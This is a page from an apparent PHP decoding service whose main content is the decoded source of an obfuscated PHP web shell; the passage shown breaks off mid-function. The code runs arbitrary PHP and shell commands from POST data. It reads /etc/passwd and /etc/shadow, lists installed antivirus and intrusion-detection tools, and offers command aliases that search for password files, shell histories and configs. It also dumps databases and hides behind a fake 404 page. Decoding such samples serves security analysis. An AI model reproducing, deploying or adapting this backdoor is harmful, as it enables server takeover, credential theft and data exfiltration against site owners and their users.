Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php goto I0hyB; w9Sjf: function actionPhp() { if (isset($_POST["\141\x6a\141\x78"])) {..

Decoded Output download

<?php 
 goto I0hyB; w9Sjf: function actionPhp() { if (isset($_POST["ajax"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); eval($_POST["vat"]); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "
\xa\x9\' ") . "';\xa"; echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["vat"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } beer_Header(); if (isset($_POST["wat"]) && $_POST["wat"] == "info") { echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>"; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU", "!td, th {(.*)}!msiU", "!<img[^>]+>!msiU"), array('', ".e, .v, .h, .h th {$1}", ''), $tmp); echo str_replace("<h1", "<h2", $tmp) . "</div><br>"; } echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" . (!empty($_POST["vat"]) ? htmlspecialchars($_POST["vat"]) : '') . "</textarea><input type=submit value=Eval style="margin-top:5px">"; echo " <input type=checkbox name=ajax value=1 " . ($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX</form><pre id=PhpOutput style="" . (empty($_POST["vat"]) ? "display:none;" : '') . "margin-top:5px;" class=ml1>"; if (!empty($_POST["vat"])) { ob_start(); eval($_POST["vat"]); echo htmlspecialchars(ob_get_clean()); } echo "</pre></div>"; beer_Footer(); } goto brDO3; DucCl: $safe_mode = @ini_get("safe_mode"); goto ZQ7ZC; ieWhI: function beer_Header() { if (empty($_POST["cset"])) { $_POST["cset"] = $GLOBALS["default_cset"]; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; cset=" . $_POST["cset"] . "'><title>" . $_SERVER["HTTP_HOST"] . "</title>\xa<style>
body{background-color:#444;color:#e1e1e1;}\xabody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }\xaspan,h1,a{ color: #df6 !important; }
span{ font-weight: bolder; }\xah1{ border-left:5px solid #df6;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\xadiv.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }\xaa:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }\xainput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid #df6; font: 9pt Monospace,'Courier New'; }\xaform{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}\xa.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}\xapre{font-family:Courier,Monospace;}\xa</style>
<script>
    var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "';
    var a_ = '" . htmlspecialchars(@$_POST["act"]) . "'\xa    var cset_ = '" . htmlspecialchars(@$_POST["cset"]) . "';\xa    var vat_ = '" . (strpos(@$_POST["vat"], "
") !== false ? '' : htmlspecialchars($_POST["vat"], ENT_QUOTES)) . "';\xa    var wat_ = '" . (strpos(@$_POST["wat"], "\xa") !== false ? '' : htmlspecialchars($_POST["wat"], ENT_QUOTES)) . "';\xa    var xat_ = '" . (strpos(@$_POST["xat"], "
") !== false ? '' : htmlspecialchars($_POST["xat"], ENT_QUOTES)) . "';\xa    var d = document;\xa	function set(a,c,vat,wat,xat,cset) {
		if(a!=null)d.mf.act.value=btoa(a);else d.mf.act.value=btoa(a_);
\x9\x9if(c!=null)d.mf.cat.value=btoa(c);else d.mf.cat.value=btoa(c_);\xa\x9	if(vat!=null)d.mf.vat.value=btoa(vat);else d.mf.vat.value=btoa(vat_);
	\x9if(wat!=null)d.mf.wat.value=btoa(wat);else d.mf.wat.value=btoa(wat_);\xa		if(xat!=null)d.mf.xat.value=btoa(xat);else d.mf.xat.value=btoa(xat_);\xa\x9\x9if(cset!=null)d.mf.cset.value=btoa(cset);else d.mf.cset.value=btoa(cset_);\xa	}\xa\x9function g(a,c,vat,wat,xat,cset) {
\x9	set(a,c,vat,wat,xat,cset);
\x9	d.mf.submit();\xa	}
\x9function a(a,c,vat,wat,xat,cset) {
		set(a,c,vat,wat,xat,cset);\xa	\x9var params = 'ajax=true';
		for(i=0;i<d.mf.elements.length;i++)
\x9\x9	params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
\x9\x9sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);
	}\xa	function sr(url, params) {\xa\x9\x9if (window.XMLHttpRequest)\xa\x9\x9	req = new XMLHttpRequest();\xa	\x9else if (window.ActiveXObject)
\x9		req = new ActiveXObject('Microsoft.XMLHTTP');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open('POST', url, true);
            req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\xa            req.send(params);\xa        }
	}\xa\x9function processReqChange() {
	\x9if( (req.readyState == 4) )\xa			if(req.status == 200) {
		\x9\x9var reg = new RegExp("(\d+)([\S\s]*)", 'm');
				var arr=reg.exec(req.responseText);\xa\x9\x9		eval(arr[2].substr(0, arr[1]));\xa\x9\x9	} else alert('Request error!');
	}
</script>\xa<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>\xa<form method=post name=mf style='display:none;'>
<input type=hidden name=act>
<input type=hidden name=cat>
<input type=hidden name=vat>
<input type=hidden name=wat>
<input type=hidden name=xat>
<input type=hidden name=cset>
<input type=hidden name=naming>
</form>"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } $csets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $opt_csets = ''; foreach ($csets as $item) { $opt_csets .= "<option value="" . $item . "" " . ($_POST["cset"] == $item ? "selected" : '') . ">" . $item . "</option>"; } $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" => "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); if (!empty($GLOBALS["auth_pass"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ''; foreach ($m as $k => $v) { $menu .= "<th width="" . (int) (100 / count($m)) . "%">[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } $drives = ''; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= " <a href="#" onclick="g('FilesMan','" . $drive . ":/')" > [" . $drive . "] </a> "; } } } echo " <table class=info cellpadding=3 cellspacing=0 width=100% > <tr> <td width=1> <span> Uname: <br> User: <br> Php: <br> Hdd: <br> Cwd:" . ($GLOBALS["os"] == "win" ? " <br> Drives:" : '') . " </span> </td> " . " <td> <nobr> " . substr(@php_uname(), 0, 120) . " </nobr> <br> " . $uid . "(" . $user . ") <span> Group: </span> " . $gid . "(" . $group . ") <br> " . @phpversion() . " <span> Safemode: </span> " . ($GLOBALS["safe_mode"] ? " <font color=red > ON </font> " : " <font color=green> <b> OFF </b> </font> ") . " <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . beer_ViewSize($totalSpace) . " <span>Free:</span> " . beer_ViewSize($freeSpace) . " (" . (int) ($freeSpace / $totalSpace * 100) . "%)<br>" . $cwd_links . " " . beer_PermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page cset">" . $opt_csets . "</optgroup></select><br><span>Server IP:</span><br>" . @$_SERVER["SERVER_ADDR"] . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div style="margin:5">"; } goto qARST; JZcSZ: function actionSecInfo() { beer_Header(); echo "<h1>Server sec information</h1><div class=content>"; function beer_SecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "\xa") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } beer_SecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { beer_SecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } beer_SecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); beer_SecParam("Open base dir", @ini_get("open_basedir")); beer_SecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); beer_SecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); beer_SecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } beer_SecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { beer_SecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); beer_SecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>" : "no"); beer_SecParam("OS version", @file_get_contents("/proc/version")); beer_SecParam("Distr name", @file_get_contents("/etc/issue.net")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bziwat", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $item) { if (beer_Which($item)) { $temp[] = $item; } } beer_SecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $item) { if (beer_Which($item)) { $temp[] = $item; } } beer_SecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $item) { if (beer_Which($item)) { $temp[] = $item; } } beer_SecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; beer_SecParam("HDD space", beer_Ex("df -h")); beer_SecParam("Hosts", @file_get_contents("/etc/hosts")); echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; if (isset($_POST["wat"], $_POST["xat"]) && is_numeric($_POST["wat"]) && is_numeric($_POST["xat"])) { $temp = ''; for (; $_POST["wat"] <= $_POST["xat"]; $_POST["wat"]++) { $uid = @posix_getpwuid($_POST["wat"]); if ($uid) { $temp .= join(":", $uid) . "
"; } } echo "<br/>"; beer_SecParam("Users", $temp); } } } else { beer_SecParam("OS Version", beer_Ex("ver")); beer_SecParam("Account Settings", beer_Ex("net accounts")); beer_SecParam("User Accounts", beer_Ex("net user")); } echo "</div>"; beer_Footer(); } goto w9Sjf; kXAlX: $cwd = @getcwd(); goto BIykg; fxZTh: if (!function_exists("posix_getgrgid") && strpos($GLOBALS["disable_functions"], "posix_getgrgid") === false) { function posix_getgrgid($p) { return false; } } goto CijWD; l3t5R: function actionLogout() { setcookie(md5($_SERVER["HTTP_HOST"]), '', time() - 3600); die("exit"); } goto zhFXO; zhFXO: function actionSelfRemove() { if ($_POST["vat"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("File has been removed"); } else { echo "unlink error!"; } } if ($_POST["vat"] != "yes") { beer_Header(); } echo "<h1>Remove</h1><div class=content>Really want to remove?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; beer_Footer(); } goto ji6I0; igmz6: function beer_ViewSize($s) { if (is_int($s)) { $s = sprintf("%u", $s); } if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto JVcoR; nkYjX: error_reporting(0); goto XyCKj; Dzyeb: function beer_Scandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto nxiKR; iACqi: function actionRC() { if (!@$_POST["vat"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["vat"]); } } goto Xqmnf; nxiKR: function beer_Which($p) { $path = beer_Ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto JZcSZ; Kk9z5: if (get_magic_quotes_gpc()) { function BEER_stripslashes($array) { return is_array($array) ? array_map("BEER_stripslashes", $array) : stripslashes($array); } $_POST = BEER_stripslashes($_POST); $_COOKIE = BEER_stripslashes($_COOKIE); } goto q0oxq; EEA0l: if (!function_exists("posix_getpwuid") && strpos($GLOBALS["disable_functions"], "posix_getpwuid") === false) { function posix_getpwuid($p) { return false; } } goto fxZTh; OepEn: @ini_set("file_uploads", 1); goto Bl3SU; vPQjc: function actionConsole() { if (!empty($_POST["vat"]) && !empty($_POST["wat"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["vat"] .= " 2>&1"; } elseif (!empty($_POST["vat"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "d.cf.cmd.value='';\xa"; $temp = @iconv($_POST["cset"], "UTF-8", addcslashes("\xa$ " . $_POST["vat"] . "\xa" . beer_Ex($_POST["vat"]), "
\xa\x9\' ")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["vat"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "d.cf.output.value+='" . $temp . "';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\xa", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["vat"])) { BEER_setcookie(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } beer_Header(); echo "<script>\xaif(window.Event) window.captureEvents(Event.KEYDOWN);\xavar cmds = new Array('');\xavar cur = 0;\xafunction kp(e) {\xa	var n = (window.Event) ? e.which : e.keyCode;\xa\x9if(n == 38) {
\x9	cur--;
\x9	if(cur>=0)\xa	\x9	document.cf.cmd.value = cmds[cur];\xa		else
	\x9\x9cur++;\xa\x9} else if(n == 40) {
\x9\x9cur++;
	\x9if(cur < cmds.length)
\x9\x9\x9document.cf.cmd.value = cmds[cur];
		else
\x9\x9\x9cur--;\xa	}
}\xafunction add(cmd) {\xa	cmds.pop();\xa	cmds.push(cmd);
	cmds.push('');\xa	cur = cmds.length-1;\xa}
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["wat"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>"; if (!empty($_POST["vat"])) { echo htmlspecialchars("$ " . $_POST["vat"] . "\xa" . beer_Ex($_POST["vat"])); } echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>d.cf.cmd.focus();</script>"; beer_Footer(); } goto l3t5R; q0oxq: foreach ($_POST as $pk => $pv) { $_POST[$pk] = base64_decode($pv); } goto x5wc6; Rj5px: if ($os == "win") { $aliases = array("ListDirectory" => "dir", "Findindex . phpincurrentdir" => "dir / s / w / bindex . php", "Find * config * . phpincurrentdir" => "dir / s / w / b * config * . php", "Showactiveconnections" => "netstat - an", "Showrunningservices" => "netstart", "Useraccounts" => "netuser", "Showcomputers" => "netview", "ARPTable" => "arp - a", "IPConfiguration" => "ipconfig / all"); } else { $aliases = array("Listdir" => "ls - lha", "listfileattributesonaLinuxsecondextendedfilesystem" => "lsattr - va", "showopenedports" => "netstat - an | grep - ilisten", "processstatus" => "psaux", "Find" => '', "findallsuidfiles" => "find / -typef - perm - 04000 - ls", "findsuidfilesincurrentdir" => "find . -typef - perm - 04000 - ls", "findallsgidfiles" => "find / -typef - perm - 02000 - ls", "findsgidfilesincurrentdir" => "find . -typef - perm - 02000 - ls", "findconfig . inc . phpfiles" => "find / -typef - nameconfig . inc . php", "findconfig * files" => "find / -typef - name"config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => '', "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto ieWhI; zJLfh: $home_cwd = @getcwd(); goto gZrfO; Nyn9W: function beer_Login() { header("HTTP/1.0 404 Not Found"); die; } goto XRmTa; I0hyB: $default_action = "FilesMan"; goto l8fZe; JVcoR: function beer_Perms($p) { if (($p & 49152) == 49152) { $i = "s "; } elseif (($p & 40960) == 40960) { $i = "l "; } elseif (($p & 32768) == 32768) { $i = "- "; } elseif (($p & 24576) == 24576) { $i = "b "; } elseif (($p & 16384) == 16384) { $i = "d "; } elseif (($p & 8192) == 8192) { $i = "c "; } elseif (($p & 4096) == 4096) { $i = "p "; } else { $i = "u "; } $i .= $p & 256 ? "r " : "- "; $i .= $p & 128 ? "w " : "- "; $i .= $p & 64 ? $p & 2048 ? "s " : "x " : ($p & 2048 ? "S " : "- "); $i .= $p & 32 ? "r " : "- "; $i .= $p & 16 ? "w " : "- "; $i .= $p & 8 ? $p & 1024 ? "s " : "x " : ($p & 1024 ? "S " : "- "); $i .= $p & 4 ? "r " : "- "; $i .= $p & 2 ? "w " : "- "; $i .= $p & 1 ? $p & 512 ? "t " : "x " : ($p & 512 ? "T " : "- "); return $i; } goto crDTV; crDTV: function beer_PermsColor($f) { if (!@is_readable($f)) { return "<font color=#FF0000>" . beer_Perms(@fileperms($f)) . "</font>"; } elseif (!@is_writable($f)) { return "<font color=white>" . beer_Perms(@fileperms($f)) . "</font>"; } else { return "<font color=#25ff00>" . beer_Perms(@fileperms($f)) . "</font>"; } } goto Dzyeb; Xqmnf: if (empty($_POST["act"])) { if (isset($default_action) && function_exists("action" . $default_action)) { $_POST["act"] = $default_action; } else { $_POST["act"] = "SecInfo"; } } goto cFBhY; KmmG0: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $default_use_ajax; } goto Rj5px; beSCq: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setcset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_cset")) { return @mysql_set_cset($str, $this->link); } else { $this->query("SET cset " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE beer_2(file text);COPY beer_2 FROM '" . addslashes($str) . "';select file from beer_2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table beer_2"); return array("file" => implode("
", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . ";
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $i = 0; $head = true; while ($item = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($item as $k => $v) { if ($v === null) { $item[$k] = "NULL"; } elseif (is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES 
	(" . implode(", ", $item) . ")"; $head = false; } else { $sql .= "
\x9,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, ";\xa\xa"); } else { echo ";
\xa"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ");" . "
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["wat"] == "download" && @$_POST["vat"] != "select") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["cset"]) { case "Windows-1251": $db->setcset("cvat251"); break; case "UTF-8": $db->setcset("utf8"); break; case "KOI8-R": $db->setcset("koi8r"); break; case "KOI8-U": $db->setcset("koi8u"); break; case "cp866": $db->setcset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["wat"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } beer_Header(); echo "
<h1>Sql browser</h1><div class=content>\xa<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\xa<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xa<input type=hidden name=a value=Sql><input type=hidden name=vat value='query'><input type=hidden name=wat value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=cset value='" . (isset($_POST["cset"]) ? $_POST["cset"] : '') . "'>\xa<td><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>
<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . ""></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["cset"]) { case "Windows-1251": $db->setcset("cvat251"); break; case "UTF-8": $db->setcset("utf8"); break; case "KOI8-R": $db->setcset("koi8r"); break; case "KOI8-U": $db->setcset("koi8u"); break; case "cp866": $db->setcset("cp866"); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td>
	\x9\x9\x9<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xa\x9\x9\x9</tr>
		</table>
\x9\x9<script>
            s_db='" . @addslashes($_POST["sql_base"]) . "';
